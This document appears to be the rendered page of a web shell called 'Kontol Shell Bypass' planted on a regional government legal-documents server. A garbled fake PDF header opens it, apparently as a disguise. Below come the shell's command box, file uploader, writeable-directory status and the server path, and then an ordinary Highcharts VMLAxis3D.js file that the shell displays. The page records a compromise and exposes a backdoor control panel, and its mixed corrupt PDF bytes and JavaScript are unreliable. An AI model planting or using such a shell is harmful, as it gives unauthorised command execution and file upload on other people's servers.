%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/assets/590bba08/es-modules/Extensions/Oldie/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/assets/590bba08/es-modules/Extensions/Oldie/VMLAxis3D.js
/* *
 *
 *  (c) 2010-2021 Torstein Honsi
 *
 *  Extension to the VML Renderer
 *
 *  License: www.highcharts.com/license
 *
 *  !!!!!!! SOURCE GETS TRANSPILED BY TYPESCRIPT. EDIT TS FILE ONLY. !!!!!!!
 *
 * */
import U from '../../Core/Utilities.js';
var addEvent = U.addEvent;
/* *
 *
 *  Class
 *
 * */
/* eslint-disable valid-jsdoc */
var VMLAxis3DAdditions = /** @class */ (function () {
    /* *
     *
     *  Constructors
     *
     * */
    function VMLAxis3DAdditions(axis) {
        this.axis = axis;
    }
    return VMLAxis3DAdditions;
}());
var VMLAxis3D = /** @class */ (function () {
    function VMLAxis3D() {
    }
    /* *
     *
     *  Static Properties
     *
     * */
    VMLAxis3D.compose = function (AxisClass) {
        AxisClass.keepProps.push('vml');
        addEvent(AxisClass, 'destroy', VMLAxis3D.onDestroy);
        addEvent(AxisClass, 'init', VMLAxis3D.onInit);
        addEvent(AxisClass, 'render', VMLAxis3D.onRender);
    };
    /**
     * @private
     */
    VMLAxis3D.onDestroy = function () {
        var axis = this, vml = axis.vml;
        if (vml) {
            var el_1;
            [
                'backFrame',
                'bottomFrame',
                'sideFrame'
            ].forEach(function (prop) {
                el_1 = vml[prop];
                if (el_1) {
                    vml[prop] = el_1.destroy();
                }
            }, this);
        }
    };
    /**
     * @private
     */
    VMLAxis3D.onInit = function () {
        var axis = this;
        if (!axis.vml) {
            axis.vml = new VMLAxis3DAdditions(axis);
        }
    };
    /**
     * @private
     */
    VMLAxis3D.onRender = function () {
        var axis = this;
        var vml = axis.vml;
        // VML doesn't support a negative z-index
        if (vml.sideFrame) {
            vml.sideFrame.css({ zIndex: 0 });
            vml.sideFrame.front.attr({
                fill: vml.sideFrame.color
            });
        }
        if (vml.bottomFrame) {
            vml.bottomFrame.css({ zIndex: 1 });
            vml.bottomFrame.front.attr({
                fill: vml.bottomFrame.color
            });
        }
        if (vml.backFrame) {
            vml.backFrame.css({ zIndex: 0 });
            vml.backFrame.front.attr({
                fill: vml.backFrame.color
            });
        }
    };
    return VMLAxis3D;
}());
export default VMLAxis3D;

Kontol Shell Bypass